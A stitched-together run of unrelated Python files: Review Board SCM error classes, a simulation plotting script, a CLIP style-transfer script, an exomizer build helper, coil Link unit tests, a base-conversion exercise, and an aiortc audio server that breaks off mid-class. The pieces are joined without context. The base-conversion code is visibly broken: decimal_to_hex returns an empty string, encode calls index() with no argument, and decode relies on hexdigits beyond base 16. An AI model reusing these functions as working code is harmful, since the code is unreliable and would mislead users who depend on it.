msg = "The file '%s' (r%s) could not be found in the repository" \
% (path, revision)
if detail:
msg += ': ' + detail
Exception.__init__(self, msg)
self.revision = revision
self.path = path
self.detail = detail
class RepositoryNotFoundError(SCMError):
"""An error indicating that a path does not represent a valid repository."""
def __init__(self):
SCMError.__init__(self, _('A repository was not found at the '
'specified path.'))
class AuthenticationError(SCMError):
"""An error representing a failed authentication for a repository.
This takes a list of authentication types that are allowed. These
are dependant on the backend, but are loosely based on SSH authentication
mechanisms. Primarily, we respond to "password" and "publickey".
This may also take the user's SSH key that was tried, if any.
"""
def __init__(self, allowed_types=[], msg=None, user_key=None):
if allowed_types:
msg = _('Unable to authenticate against this repository using one '
'of the supported authentication types '
'(%(allowed_types)s).') % {
'allowed_types': humanize_list(allowed_types),
}
elif not msg:
msg = _('Unable to authenticate against this repository using one '
'of the supported authentication types.')
SCMError.__init__(self, msg)
self.allowed_types = allowed_types
self.user_key = user_key
class UnverifiedCertificateError(SCMError):
"""An error representing an unverified HTTPS certificate."""
def __init__(self, certificate):
SCMError.__init__(self, _('A verified HTTPS certificate is required '
'to connect to this repository.'))
self.certificate = certificate
class UnsupportedSSHKeyError(SCMError):
"""An error representing an unsupported type of SSH key."""
def __init__(self):
SCMError.__init__(self,
_('This SSH key is not a valid RSA or DSS key.'))
class SSHKeyError(SCMError):
"""An error involving a host key on an SSH connection."""
def __init__(self, hostname, key, message):
from reviewboard.scmtools.sshutils import humanize_key
SCMError.__init__(self, message)
self.hostname = hostname
self.key = humanize_key(key)
self.raw_key = key
class BadHostKeyError(SSHKeyError):
"""An error representing a bad or malicious key for an SSH connection."""
def __init__(self, hostname, key, expected_key):
from reviewboard.scmtools.sshutils import humanize_key
SSHKeyError.__init__(
self, hostname, key,
_("Warning! The host key for server %(hostname)s does not match "
"the expected key.\n"
"It's possible that someone is performing a man-in-the-middle "
"attack. It's also possible that the RSA host key has just "
"been changed. Please contact your system administrator if "
"you're not sure. Do not accept this host key unless you're "
"certain it's safe!")
% {
'hostname': hostname,
'ip_address': socket.gethostbyname(hostname),
})
self.expected_key = humanize_key(expected_key)
self.raw_expected_key = expected_key
class UnknownHostKeyError(SSHKeyError):
"""An error representing an unknown host key for an SSH connection."""
def __init__(self, hostname, key):
SSHKeyError.__init__(
self, hostname, key,
_("The authenticity of the host '%(hostname)s (%(ip)s)' "
"couldn't be determined.") % {
'hostname': hostname,
'ip': socket.gethostbyname(hostname),
}
)
|
<filename>plots/plots_simulation_main.py
#! /usr/bin/env python3
import numpy as np
from scipy.stats import gaussian_kde as kde
import matplotlib.pyplot as plt
from matplotlib import rc
rc('font',**{'family':'serif','serif':['Times']})
rc('text', usetex=True)
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-M", type=int, dest="M", default=250, const=True, nargs="?",\
help="Number of events used for inference. Default M=250.")
## Parse arguments
args = parser.parse_args()
M = args.M
## Truth
alpha = np.array([0.01,0.05]); beta = np.array([0.07,0.03]); baseline = np.add.outer(alpha,beta)
mu = np.array([0.2,0.15]); mu_prime = np.array([0.1,0.25])
phi = np.array([0.8,0.85]); phi_prime = np.array([0.9,0.75])
decay = mu + phi; decay_prime = mu_prime + phi_prime
## Estimates of baseline
alpha_em = np.load('../results/simulation_main/estimation_'+str(M)+'/alpha_em.npy'); beta_em = np.load('../results/simulation_main/estimation_'+str(M)+'/beta_em.npy')
alpha_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/alpha_ga.npy'); beta_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/beta_ga.npy')
baseline_em = np.array([np.add.outer(alpha_em[i], beta_em[i]) for i in range(alpha_em.shape[0])])
baseline_ga = np.array([np.add.outer(alpha_ga[i], beta_ga[i]) for i in range(alpha_ga.shape[0])])
fig, axs = plt.subplots(2, 2, constrained_layout=True)
for i in [0,1]:
for j in [0,1]:
mmin = np.min([np.min(baseline_em[:,i,j]),np.min(baseline_ga[:,i,j])])
mmax = np.max([np.max(baseline_em[:,i,j]),np.max(baseline_ga[:,i,j])])
positions = np.linspace(mmin,mmax,num=250)
kernel_em = kde(baseline_em[:,i,j], bw_method='silverman')
kernel_ga = kde(baseline_ga[:,i,j], bw_method='silverman')
axs[i,j].hist(baseline_em[:,i,j], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
axs[i,j].hist(baseline_ga[:,i,j], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
axs[i,j].axvline(x=baseline[i,j],ls='dotted',c='black', lw=3, label='Truth')
if i == 0 and j == 0:
axs[i,j].legend()
axs[i,j].set_ylabel('Density')
axs[i,j].set_xlabel('$\\hat{\\alpha}_{'+str(i+1)+'}+\\hat{\\beta}_{'+str(j+1)+'}$')
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/alpha_beta.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
## Estimates of jump
mu_em = np.load('../results/simulation_main/estimation_'+str(M)+'/mu_em.npy'); mu_prime_em = np.load('../results/simulation_main/estimation_'+str(M)+'/mu_prime_em.npy')
mu_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/mu_ga.npy'); mu_prime_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/mu_prime_ga.npy')
fig, axs = plt.subplots(2, 2, constrained_layout=True)
for i in [0,1]:
for j in [0,1]:
if j == 0:
mmin = np.min([np.min(mu_em[:,i]),np.min(mu_ga[:,i])])
mmax = np.max([np.max(mu_em[:,i]),np.max(mu_ga[:,i])])
positions = np.linspace(mmin,mmax,num=250)
kernel_em = kde(mu_em[:,i], bw_method='silverman')
kernel_ga = kde(mu_ga[:,i], bw_method='silverman')
axs[i,j].hist(mu_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
axs[i,j].hist(mu_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
axs[i,j].axvline(x=mu[i],ls='dotted',c='black', lw=3, label='Truth')
if i == 0 and j == 0:
axs[i,j].legend()
axs[i,j].set_ylabel('Density')
axs[i,j].set_xlabel('$\\hat{\\mu}_{'+str(i+1)+'}$')
else:
mmin = np.min([np.min(mu_prime_em[:,i]),np.min(mu_prime_ga[:,i])])
mmax = np.max([np.max(mu_prime_em[:,i]),np.max(mu_prime_ga[:,i])])
positions = np.linspace(mmin,mmax,num=250)
kernel_em = kde(mu_prime_em[:,i], bw_method='silverman')
kernel_ga = kde(mu_prime_ga[:,i], bw_method='silverman')
axs[i,j].hist(mu_prime_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
axs[i,j].hist(mu_prime_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
axs[i,j].axvline(x=mu_prime[i],ls='dotted',c='black', lw=3, label='Truth')
if i == 0 and j == 0:
axs[i,j].legend()
axs[i,j].set_ylabel('Density')
axs[i,j].set_xlabel('$\\hat{\\mu}^\\prime_{'+str(i+1)+'}$')
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/mu.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
## Estimates of decay
phi_em = np.load('../results/simulation_main/estimation_'+str(M)+'/phi_em.npy'); phi_prime_em = np.load('../results/simulation_main/estimation_'+str(M)+'/phi_prime_em.npy')
phi_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/phi_ga.npy'); phi_prime_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/phi_prime_ga.npy')
decay_em = mu_em + phi_em; decay_prime_em = mu_prime_em + phi_prime_em
decay_ga = mu_ga + phi_ga; decay_prime_ga = mu_prime_ga + phi_prime_ga
fig, axs = plt.subplots(2, 2, constrained_layout=True)
for i in [0,1]:
for j in [0,1]:
if j == 0:
mmin = np.min([np.min(decay_em[:,i]),np.min(decay_ga[:,i])])
mmax = np.max([np.max(decay_em[:,i]),np.max(decay_ga[:,i])])
positions = np.linspace(mmin,mmax,num=250)
kernel_em = kde(decay_em[:,i], bw_method='silverman')
kernel_ga = kde(decay_ga[:,i], bw_method='silverman')
axs[i,j].hist(decay_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
axs[i,j].hist(decay_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
axs[i,j].axvline(x=decay[i],ls='dotted',c='black', lw=3, label='Truth')
if i == 0 and j == 0:
axs[i,j].legend()
axs[i,j].set_ylabel('Density')
axs[i,j].set_xlabel('$\\hat{\\mu}_{'+str(i+1)+'}+\\hat{\\phi}_{'+str(i+1)+'}$')
else:
mmin = np.min([np.min(decay_prime_em[:,i]),np.min(decay_prime_ga[:,i])])
mmax = np.max([np.max(decay_prime_em[:,i]),np.max(decay_prime_ga[:,i])])
positions = np.linspace(mmin,mmax,num=250)
kernel_em = kde(decay_prime_em[:,i], bw_method='silverman')
kernel_ga = kde(decay_prime_ga[:,i], bw_method='silverman')
axs[i,j].hist(decay_prime_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
axs[i,j].hist(decay_prime_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
axs[i,j].plot(positions, kernel_em(positions), lw=3, label='EM')
axs[i,j].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
axs[i,j].axvline(x=decay_prime[i],ls='dotted',c='black', lw=3, label='Truth')
if i == 0 and j == 0:
axs[i,j].legend()
axs[i,j].set_ylabel('Density')
axs[i,j].set_xlabel('$\\hat{\\mu}^\\prime_{'+str(i+1)+'}+\\hat{\\phi}^\\prime_{'+str(i+1)+'}$')
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/mu_phi.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
## Plots for asymptotic comparisons
fig, axs = plt.subplots(2, 1, figsize=(3.2,4.8), constrained_layout=True)
for i in [0,1]:
mmin = np.min([np.min(decay_em[:,i]),np.min(decay_ga[:,i])])
mmax = np.max([np.max(decay_em[:,i]),np.max(decay_ga[:,i])])
positions = np.linspace(mmin,mmax,num=250)
kernel_em = kde(decay_em[:,i], bw_method='silverman')
kernel_ga = kde(decay_ga[:,i], bw_method='silverman')
axs[i].hist(decay_em[:,i], density=True, bins=15, color='lightgray', histtype=u'step', lw=2)
axs[i].hist(decay_ga[:,i], density=True, bins=15, color='lightgray', histtype=u'step', ls='dashed', lw=2)
axs[i].plot(positions, kernel_em(positions), lw=3, label='EM')
axs[i].plot(positions, kernel_ga(positions), ls='dashed', lw=3, label='Adam')
axs[i].axvline(x=decay[i],ls='dotted',c='black', lw=3, label='Truth')
if i == 0:
axs[i].legend()
axs[i].set_xlim(0,2.75)
else:
axs[i].set_xlim(0,3.75)
axs[i].set_ylabel('Density')
axs[i].set_xlabel('$\\hat{\\mu}_{'+str(i+1)+'}+\\hat{\\phi}_{'+str(i+1)+'}$')
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/mu_phi_asy_'+str(M)+'.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
# Import KS scores
ks_em = np.load('../results/simulation_main/estimation_'+str(M)+'/ks_score_em.npy')
ks_ga = np.load('../results/simulation_main/estimation_'+str(M)+'/ks_score_ga.npy')
fig, axes = plt.subplots()
bplot = axes.boxplot([ks_ga,ks_em],vert=False,labels=['Adam', 'EM'], widths=.5, patch_artist=True)
for element in ['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']:
plt.setp(bplot[element], color='black')
axes.xaxis.grid(True)
axes.set_xlabel('Kolmogorov-Smirnov scores')
# Fill with colors
colors = ['orange', 'cornflowerblue']
for patch, color in zip(bplot['boxes'], colors):
patch.set_facecolor(color)
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/ks_scores.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False)
## Vertical boxplot
fig, axes = plt.subplots(figsize=(3.2,2.4))
bplot = axes.boxplot([ks_em,ks_ga],vert=True,labels=['EM','Adam'], widths=.5, patch_artist=True)
for element in ['boxes', 'whiskers', 'fliers', 'means', 'medians', 'caps']:
plt.setp(bplot[element], color='black')
axes.yaxis.grid(True)
axes.set_ylabel('KS scores')
axes.set_ylim(0,0.0875)
# Fill with colors
colors = ['cornflowerblue','orange']
for patch, color in zip(bplot['boxes'], colors):
patch.set_facecolor(color)
plt.savefig('../results/simulation_main/estimation_'+str(M)+'/ks_scores_vert_'+str(M)+'.png', bbox_inches='tight', pad_inches = 0.1, dpi=500)
plt.show(block=False) |
import glob
import os
import pathlib
import argparse
import torch
from lib.pl_utils import UnNormalize
from model_define import StyleTransfer
import torchvision.transforms as transforms
from PIL import Image
import clip
import torchvision.utils as vutils
# Testing settings
parser = argparse.ArgumentParser(description='PyTorch TxST Example')
parser.add_argument('--content', type=str, default='data/content', help="content images")
parser.add_argument('--style', type=str, default='data/style', help='style images')
opt = parser.parse_args()
def tensor_rgb2gray(tensor_img):
tensor_img_gray = tensor_img[:, 0:1, :, :] * 0.299 + tensor_img[:, 1:2, :, :] * 0.587 + tensor_img[:, 2:3, :,
:] * 0.114
tensor_img_gray = tensor_img_gray.expand(tensor_img.size())
return tensor_img_gray
def read_content_img(img_path, img_siz=None):
if img_siz is None:
transform_list = [#transforms.Resize((img_siz, img_siz)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]
else:
transform_list = [transforms.Resize((img_siz, img_siz)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])]
m_transform = transforms.Compose(transform_list)
img = Image.open(img_path).convert('RGB')
img_tensor = m_transform(img)
return img_tensor.unsqueeze(0).cuda()
def read_style_img(img_path, img_siz=256):
style_img = read_content_img(img_path, img_siz)
style_name = os.path.basename(os.path.dirname(img_path))
# print(style_name)
return style_img, clip.tokenize(style_name.replace("_", " "))[0].unsqueeze(0).cuda()
def custom_text(text):
return clip.tokenize(text)[0].unsqueeze(0)
if __name__ == '__main__':
m_model = StyleTransfer.load_from_checkpoint(
"models/wikiart_subset.ckpt", strict=False).cuda()
cont_imgs = glob.glob(os.path.join(opt.content, "*.*"))
style_imgs = glob.glob(os.path.join(opt.style, "*.*"))
for cont_file in cont_imgs:
for style_file in style_imgs:
save_path = os.path.join("output/", "%s_stylized_%s.png"%(pathlib.Path(cont_file).stem,pathlib.Path(style_file).stem))
I_c = read_content_img(cont_file, img_siz=512)
I_s, style_token = read_style_img(style_file)
# ==== original inference ====
# encoding
F_c = m_model.encoder(I_c)
F_clip_c = m_model.text_editor.encode_img(I_c)
F_clip_s = m_model.text_editor.encode_img(I_s)
# style transfer
styled = m_model.transform(F_clip_c['raw_feat'], F_clip_s['raw_feat'], F_c)
# decoding
I_cs = m_model.decoder(styled)
# visualize
m_unnormalize = UnNormalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))
transfer = m_unnormalize(I_cs).squeeze(0).clamp(0, 1).cpu().data
# Add 0.5 after unnormalizing to [0, 255] to round to nearest integer
ndarr = transfer.mul(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
im = Image.fromarray(ndarr)
im.save(save_path)
# im.show()
|
#!/usr/bin/env python3
# ----------------------------------------------------------------------------
# Copyright 2019 Drunella
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import sys
import glob
import subprocess
import argparse
import traceback
import re
import pprint
def file_readaddress(filename):
with open(filename, "rb") as f:
low = f.read(1)[0]
high = f.read(1)[0]
return high*256 + low
#def file_prependaddress(filename, address):
# low = address % 256
# high = address // 256
# with open(filename, "rb") as f:
# data = f.read()
# with open(filename, "wb") as f:
# f.seek(0)
# b = bytearray(1)
# b[0] = low
# f.write(b)
# b[0] = high
# f.write(b)
# f.write(data)
def file_crunch(infilename, outfilename, crunchtype, startaddress=0):
global safety_offset
if crunchtype == "level":
# for easyflash
arguments = ["exomizer", "level", \
"-T4", "-P7", \
"-m", "256", \
"-M", "256", \
"-o", outfilename, \
infilename \
]
elif crunchtype == "mem":
# for d81
arguments = ["exomizer", "mem", \
"-l", "0x{0:04x}".format(startaddress), \
"-T4", "-P7", \
"-m", "256", \
"-M", "256", \
"-o", outfilename, \
infilename \
]
else:
raise Exception("unknown type " + crunchtype)
result = subprocess.run(arguments, stdout=subprocess.PIPE, universal_newlines=True)
if result.returncode != 0:
raise Exception("error crunching file " + infilename)
m = re.search("Crunched data reduced ([0-9-]*) bytes .([0-9-]*).", result.stdout)
if not m:
print("warning: no compression info on " + outfilename)
else:
size = int(m.group(1), 0)
ratio = int(m.group(2), 0)
if ratio < 0:
print("warning: negative ratio (" + str(ratio) + "%) for " + outfilename)
return
m = re.search("safety offset is ([0-9]*)", result.stdout)
if not m:
print("warning: no safety offset on " + outfilename)
else:
offset = int(m.group(1), 0)
if offset > safety_offset:
safety_offset = offset
def main(argv):
global source_path
global safety_offset
p = argparse.ArgumentParser()
p.add_argument("-v", dest="verbose", action="store_true", help="Verbose output.")
p.add_argument("-b", dest="build", action="store", required=True, help="build directory.")
p.add_argument("-t", dest="type", action="store", required=True, help="exomizer type.")
args = p.parse_args()
# temp_path = os.path.join(args.build, "temp")
# os.makedirs(temp_path, exist_ok=True)
files_path = args.build #os.path.join(args.build, "files")
os.makedirs(files_path, exist_ok=True)
if args.type == "mem":
crunchtype = "mem"
elif args.type == "level":
crunchtype = "level"
else:
raise Exception("unknown type " + args.type)
amount = 0
for filename in os.listdir(files_path):
if not filename.endswith(".prg"):
continue
amount += 1
count = 0
safety_offset = 0
for f in os.listdir(files_path):
if not f.endswith(".prg"):
continue
count += 1
if args.verbose:
print("processing file {0:d} of {1:d} \r".format(count, amount), end='\r')
basename = f[0:-4]
infilename = os.path.join(files_path, f)
outfilename = os.path.join(files_path, basename + ".crunch")
address = file_readaddress(infilename)
file_crunch(infilename, outfilename, crunchtype, address)
#file_prependaddress(outfilename, address)
if args.verbose:
print("")
# make a file to let make know we are ready
ready_path = os.path.join(files_path, "crunched.done")
open(ready_path, 'a').close()
print("maximum safety offset is: " + str(safety_offset))
if __name__ == '__main__':
try:
retval = main(sys.argv)
sys.exit(retval)
except Exception as e:
print(e)
traceback.print_exc()
sys.exit(1)
|
<filename>coil/test/test_link.py<gh_stars>1-10
"""Tests for coil.struct.Link"""
import unittest
from coil import errors
from coil.struct import Node, Link
class BasicTestCase(unittest.TestCase):
def setUp(self):
self.r = Node()
self.a = Node(None, self.r, "a")
self.b = Node(None, self.a, "b")
def assertRelative(self, link, expect):
relative = link.relative_path(link.link_path, '..')
self.assertEquals(relative, expect)
def assertAbsolute(self, link, expect):
absolute = link.absolute_path(link.link_path, '..')
self.assertEquals(absolute, expect)
def testInit(self):
w = Link("@root", self.r, "w")
x = Link("i.j.k", self.r, "x")
y = Link("..j.k", self.a, "y")
z = Link("..k", self.b, "z")
self.assertRelative(w, ".")
self.assertAbsolute(w, "@root")
self.assertRelative(x, "i.j.k")
self.assertAbsolute(x, "@root.i.j.k")
self.assertRelative(y, "..j.k")
self.assertAbsolute(y, "@root.j.k")
self.assertRelative(z, "..k")
self.assertAbsolute(z, "@root.a.k")
self.assertRaises(errors.CoilError, Link, "..z", self.r, "z")
def testCopy1(self):
x = Link("b", self.a, "x")
self.assertEquals(x.node_path, "@root.a.x")
self.assertRelative(x, "b")
self.assertAbsolute(x, "@root.a.b")
a2 = self.a.copy()
x2 = x.copy(a2, "x")
self.assertEquals(x2.node_path, "@root.x")
self.assertRelative(x2, "b")
self.assertAbsolute(x2, "@root.b")
def testCopy2(self):
x = Link("..i", self.a, "x")
y = x.copy(self.b, "y")
self.assertEquals(x.node_path, "@root.a.x")
self.assertRelative(x, "..i")
self.assertAbsolute(x, "@root.i")
self.assertEquals(y.node_path, "@root.a.b.y")
self.assertRelative(y, "..i")
self.assertAbsolute(y, "@root.a.i")
def testCopyTree1(self):
x = Link("i", self.a, "x")
self.assertEquals(x.node_path, "@root.a.x")
self.assertEquals(x.link_path, "i")
self.assertRelative(x, "i")
self.assertAbsolute(x, "@root.a.i")
y = x.copy(self.b, "y")
self.assertEquals(y.node_path, "@root.a.b.y")
self.assertEquals(y.link_path, "i")
self.assertRelative(y, "i")
self.assertAbsolute(y, "@root.a.b.i")
r2 = self.r.copy()
a2 = self.a.copy(r2, "a")
b2 = self.b.copy(a2, "b")
x2 = x.copy(a2, "x")
y2 = y.copy(b2, "y")
self.assertEquals(x2.node_path, "@root.a.x")
self.assertEquals(x2.link_path, "i")
self.assertRelative(x2, "i")
self.assertAbsolute(x2, "@root.a.i")
self.assertEquals(y2.node_path, "@root.a.b.y")
self.assertEquals(y2.link_path, "i")
self.assertRelative(y2, "i")
self.assertAbsolute(y2, "@root.a.b.i")
def testCopyTree2(self):
x = Link("@root.a.i", self.a, "x")
self.assertEquals(x.node_path, "@root.a.x")
self.assertEquals(x.link_path, "@root.a.i")
self.assertRelative(x, "i")
self.assertAbsolute(x, "@root.a.i")
y = x.copy(self.b, "y")
self.assertEquals(y.node_path, "@root.a.b.y")
self.assertEquals(y.link_path, "@root.a.i")
self.assertRelative(y, "..i")
self.assertAbsolute(y, "@root.a.i")
r2 = self.r.copy()
a2 = self.a.copy(r2, "a")
b2 = self.b.copy(a2, "b")
x2 = x.copy(a2, "x")
y2 = y.copy(b2, "y")
self.assertEquals(x2.node_path, "@root.a.x")
self.assertEquals(x2.link_path, "@root.a.i")
self.assertRelative(x2, "i")
self.assertAbsolute(x2, "@root.a.i")
self.assertEquals(y2.node_path, "@root.a.b.y")
self.assertEquals(y2.link_path, "@root.a.i")
self.assertRelative(y2, "..i")
self.assertAbsolute(y2, "@root.a.i")
def testCopySubTree1(self):
x = Link("i", self.a, "x")
self.assertEquals(x.node_path, "@root.a.x")
self.assertEquals(x.link_path, "i")
self.assertRelative(x, "i")
self.assertAbsolute(x, "@root.a.i")
y = x.copy(self.b, "y")
self.assertEquals(y.node_path, "@root.a.b.y")
self.assertEquals(y.link_path, "i")
self.assertRelative(y, "i")
self.assertAbsolute(y, "@root.a.b.i")
a2 = self.a.copy()
b2 = self.b.copy(a2, "b")
x2 = x.copy(a2, "x")
y2 = y.copy(b2, "y")
self.assertEquals(x2.node_path, "@root.x")
self.assertEquals(x2.link_path, "i")
self.assertRelative(x2, "i")
self.assertAbsolute(x2, "@root.i")
self.assertEquals(y2.node_path, "@root.b.y")
self.assertEquals(y2.link_path, "i")
self.assertRelative(y2, "i")
self.assertAbsolute(y2, "@root.b.i")
def testCopySubTree2(self):
x = Link("@root.a.i", self.a, "x")
self.assertEquals(x.node_path, "@root.a.x")
self.assertEquals(x.link_path, "@root.a.i")
self.assertRelative(x, "i")
self.assertAbsolute(x, "@root.a.i")
y = x.copy(self.b, "y")
self.assertEquals(y.node_path, "@root.a.b.y")
self.assertEquals(y.link_path, "@root.a.i")
self.assertRelative(y, "..i")
self.assertAbsolute(y, "@root.a.i")
a2 = self.a.copy()
b2 = self.b.copy(a2, "b")
x2 = x.copy(a2, "x")
y2 = y.copy(b2, "y")
self.assertEquals(x2.node_path, "@root.x")
self.assertEquals(x2.link_path, "@root.i")
self.assertRelative(x2, "i")
self.assertAbsolute(x2, "@root.i")
self.assertEquals(y2.node_path, "@root.b.y")
self.assertEquals(y2.link_path, "@root.i")
self.assertRelative(y2, "..i")
self.assertAbsolute(y2, "@root.i")
|
#!python
import string
# Hint: Use these string constants to encode/decode hexadecimal digits and more
# string.digits is '0123456789'
# string.hexdigits is '0123456789abcdefABCDEF'
# string.ascii_lowercase is 'abcdefghijklmnopqrstuvwxyz'
# string.ascii_uppercase is 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# string.ascii_letters is ascii_lowercase + ascii_uppercase
# string.printable is digits + ascii_letters + punctuation + whitespace
def binary_to_decimal(binary):
"""Converts a binary number(str) into a decimal(int)"""
reversed_binary = binary[::- 1]
# i = corresponds to power of 2 when reversed
decimal = 0 # keep track of sum
for i, value in enumerate(reversed_binary):
if value == "0":
continue # ignore 0 because no value
decimal += 2**i # multiply 2 by i b/c i = exponent
return decimal
def decimal_to_binary(decimal):
"""Converts a decimal(int) into binary(str)"""
binary_result = ''
# new_decimal = int(decimal)
while decimal > 0:
remainder = decimal % 2
binary_result = str(remainder) + binary_result
decimal = int(decimal / 2)
return binary_result
def hex_to_decimal(hex_val):
"""Converts hex value(str) to decimal(int)"""
reversed_hex = hex_val[::-1] # reverse so power(of 16) = index
decimal = 0 # keep track of sum
hex_conversion = string.hexdigits # access letters a-f
for i, value in enumerate(reversed_hex): # index = power
new_value = hex_conversion.index(value.lower())
decimal += new_value * (16 ** i)
return decimal
def decimal_to_hex(decimal):
"""Converts decimal(int) to hex value(str)"""
hex_result = ''
hex_conversion = string.hexdigits # access letters a-f
while decimal > 0:
remainder = decimal % 16
decimal = int(decimal / 16)
return hex_result
def decode(digits, base):
"""Decode given digits in given base to number in base 10.
digits: str -- string representation of number (in given base)
base: int -- base of given number
return: int -- integer representation of number (in base 10)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base <= 36, 'base is out of range: {}'.format(base)
decoded_result = 0
reversed_input = digits[::-1]
for i, value in enumerate(reversed_input):
hex_conversion = string.hexdigits
converted_value = hex_conversion.index(value.lower())
decoded_result += converted_value * (base ** i)
return decoded_result
def encode(number, base):
"""Encode given number in base 10 to digits in given base.
number: int -- integer representation of number (in base 10)
base: int -- base to convert to
return: str -- string representation of number (in given base)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base <= 36, 'base is out of range: {}'.format(base)
# Handle unsigned numbers only for now
assert number >= 0, 'number is negative: {}'.format(number)
encoded_result = ''
while number > 0:
remainder = number % base
number = int(number/base)
conversion = string.ascii_lowercase
converted_value = conversion.index()
encoded_result = converted_value
return encoded_result
def convert(digits, base1, base2):
"""Convert given digits in base1 to digits in base2.
digits: str -- string representation of number (in base1)
base1: int -- base of given number
base2: int -- base to convert to
return: str -- string representation of number (in base2)"""
# Handle up to base 36 [0-9a-z]
assert 2 <= base1 <= 36, 'base1 is out of range: {}'.format(base1)
assert 2 <= base2 <= 36, 'base2 is out of range: {}'.format(base2)
number = decode(digits, base1)
return encode(number, base2)
# TODO: Convert digits from base 2 to base 16 (and vice versa)
# ...
# TODO: Convert digits from base 2 to base 10 (and vice versa)
# ...
# TODO: Convert digits from base 10 to base 16 (and vice versa)
# ...
# TODO: Convert digits from any base to any base (2 up to 36)
# ...
def main():
"""Read command-line arguments and convert given digits between bases."""
import sys
args = sys.argv[1:] # Ignore script file name
if len(args) == 3:
digits = args[0]
base1 = int(args[1])
base2 = int(args[2])
# Convert given digits between bases
result = convert(digits, base1, base2)
print('{} in base {} is {} in base {}'.format(
digits, base1, result, base2))
else:
print('Usage: {} digits base1 base2'.format(sys.argv[0]))
print('Converts digits from base1 to base2')
if __name__ == '__main__':
main()
print('binary to decimal:')
print(binary_to_decimal('101010'))
print('decimal to binay:')
print(decimal_to_binary(10))
print('hex to decimal:')
print(hex_to_decimal('FF'))
print('decimal to hex:')
print(decimal_to_hex(185))
print("DECODE")
print(decode('14414', 5))
print(decode('1010', 2))
print(decode('B9', 16))
print("ENCODE")
print(encode(10, 16))
|
import argparse
import asyncio
import json
import logging
import os
import ssl
import uuid
import weakref
from datetime import datetime, timedelta
from io import BytesIO
from threading import Thread
import aiohttp
import aiohttp_cors
import av
import requests
from aiohttp import web
from aiortc import MediaStreamTrack, RTCPeerConnection, RTCSessionDescription
from aiortc.contrib.media import MediaBlackhole, MediaPlayer
from pydub import AudioSegment
from dotenv import load_dotenv
def convert(ogg_file):
return AudioSegment.from_ogg(ogg_file).export(format="wav", bitrate="16k", parameters=["-ar", "16000"])
def convert_wav_to_ogg(wav_file):
return AudioSegment.from_wav(wav_file).export(format="ogg")
ROOT = os.path.dirname(__file__)
logger = logging.getLogger("pc")
speakers = dict()
pcs = set()
meetings = dict()
buffer = BytesIO()
# Make sure we have the fresh dotenv
load_dotenv()
# configs
USE_TRANSCRIBER = bool(os.getenv('USE_TRANSCRIBER', "false") == "true")
TRANSLATOR_ENDPOINT = str(os.getenv('TRANSLATOR_ENDPOINT', "http://localhost:5000/upload"))
print(f"USE_TRANSCRIBER: {USE_TRANSCRIBER}")
print(f"TRANSLATOR_ENDPOINT: {TRANSLATOR_ENDPOINT}")
# On IBM Cloud Cloud Foundry, get the port number from the environment variable PORT
# When running this app on the local machine, default the port to 8000
port = int(os.getenv('PORT', 8080))
STATIC_PATH = os.path.join(ROOT, "build/static/")
def call_external_translator(ogg_buffer):
logging.info(f"Calling transcripts dir")
requests.post(TRANSLATOR_ENDPOINT,
files={'file': ('helloworld.ogg', BytesIO(ogg_buffer))})
logging.info("Submitted transcript")
class AudioTransformTrack(MediaStreamTrack):
kind = "audio"
